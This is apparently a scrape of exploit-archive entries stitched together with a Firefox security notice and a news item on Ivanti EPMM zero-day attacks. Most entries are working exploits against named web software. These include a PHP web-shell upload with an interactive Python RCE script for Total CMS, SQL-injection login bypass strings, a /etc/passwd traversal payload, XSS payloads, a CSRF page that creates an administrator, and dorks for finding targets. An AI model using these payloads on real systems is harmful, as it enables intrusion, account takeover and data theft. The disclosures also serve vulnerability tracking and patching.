File Upload vulnerability in Total CMS v.1.7.4 allows a remote attacker to execute arbitrary code via a crafted PHP file to the edit page function.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

CVE-2023-36212: Total CMS 1.7.4 Shell Upload ≈ Packet Storm

Ubuntu Security Notice 6267-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy.

    ==========================================================================Ubuntu Security Notice USN-6267-1August 02, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-4047,CVE-2023-4048, CVE-2023-4049, CVE-2023-4051, CVE-2023-4053, CVE-2023-4055,CVE-2023-4056, CVE-2023-4057, CVE-2023-4058)Max Vlasov discovered that Firefox Offscreen Canvas did not properly trackcross-origin tainting. An attacker could potentially exploit this issue toaccess image data from another site in violation of same-origin policy.(CVE-2023-4045)Alexander Guryanov discovered that Firefox did not properly update thevalue of a global variable in WASM JIT analysis in some circumstances. Anattacker could potentially exploit this issue to cause a denial of service.(CVE-2023-4046)Mark Brand discovered that Firefox did not properly validate the size ofan untrusted input stream. An attacker could potentially exploit this issueto cause a denial of service. (CVE-2023-4050)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         116.0+build2-0ubuntu0.20.04.2After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6267-1  CVE-2023-4045, CVE-2023-4046, CVE-2023-4047, CVE-2023-4048,  CVE-2023-4049, CVE-2023-4050, CVE-2023-4051, CVE-2023-4053,  CVE-2023-4055, CVE-2023-4056, CVE-2023-4057, CVE-2023-4058Package Information:  https://launchpad.net/ubuntu/+source/firefox/116.0+build2-0ubuntu0.20.04.2

Ubuntu Security Notice USN-6267-1

Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...]<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">        <?php echo $Form->label('roleTitle', 'Title'); ?>        <div class="form-entry">            <?php echo $Form->text('roleTitle', $Form->get($details,'roleTitle')); ?>        </div>    </div>[...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST"><img src=x onerror=alert(1)>// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4[...][...]<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=xonerror=alert(1)></a>[...]

Perch CMS 3.2 Cross Site Scripting

Cryptolive CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Cryptolive cms v1.0 Auth by pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://scriptmafia.org/                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] user & pass : 1'or'1'='1[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Cryptolive CMS 1.0 SQL Injection

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

CREDITS PREVICINI CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CREDITS PREVICINI CMS v1.02 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.previcinidesign.com/                                                                                    |  | # Dork      : inurl:id= Or Web by PREVICINIDESIGN & php?id=                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/amarcordpiadineriait/notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CREDITS PREVICINI CMS 1.02 Cross Site Scripting

Courier Deprixa Pro Integrated Web System version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |    
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : settings/addusersadmin/agregar.php

[+] save code as poc.html .

<div class="modal-content">  
              <div class="modal-header">  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/bluedotcourriercom/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" data-parsley-id="12">  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">  
                  </div>  
                  </div>  
                  <br><br>  
                    <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>  
                         
          </div>  
            
          </div>  
        </div>         
        </div>  
          
      </div>  
      </div>  
            
    </div>  
    </div>  
  </div>  
  

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Courier Deprixa Pro Integrated Web System 3.2.5 Cross Site Request Forgery

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

CVE-2023-33257: Verint Live-chat HTML injection

Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network.
The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian

Vulnerability / Cyber Attack

Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network.

The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear.

"The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said. "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure.'

CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulnerability, CVE-2023-35081, to cause unintended consequences on targeted devices.

Successful exploitation of the twin vulnerabilities makes it possible for adversaries with EPMM administrator privileges to write arbitrary files, such as web shells, with operating system privileges of the EPMM web application server.

The attackers have also been observed tunneling traffic from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet, although it's currently unknown how this was accomplished.

Further analysis has revealed the presence of a WAR file called "mi.war" on Ivanti Sentry, which has been described as a malicious Tomcat application that deletes log entries based on a specific string – "Firefox/107.0" – contained in a text file.

"The APT actors used Linux and Windows user agents with Firefox/107.0 to communicate with EPMM," the agencies said. "Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices."

A majority of the 5,500 EPMM servers on the internet are located in Germany, followed by the U.S., the U.K., France, Switzerland, the Netherlands, Hong Kong, Austria, China, and Sweden, according to Palo Alto Networks Unit 42.

To mitigate against the ongoing threat, it's recommended that organizations apply the latest patches as soon as possible, mandate phishing-resistant multi-factor authentication (MFA) for all staff and services, and validate security controls to test their effectiveness.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox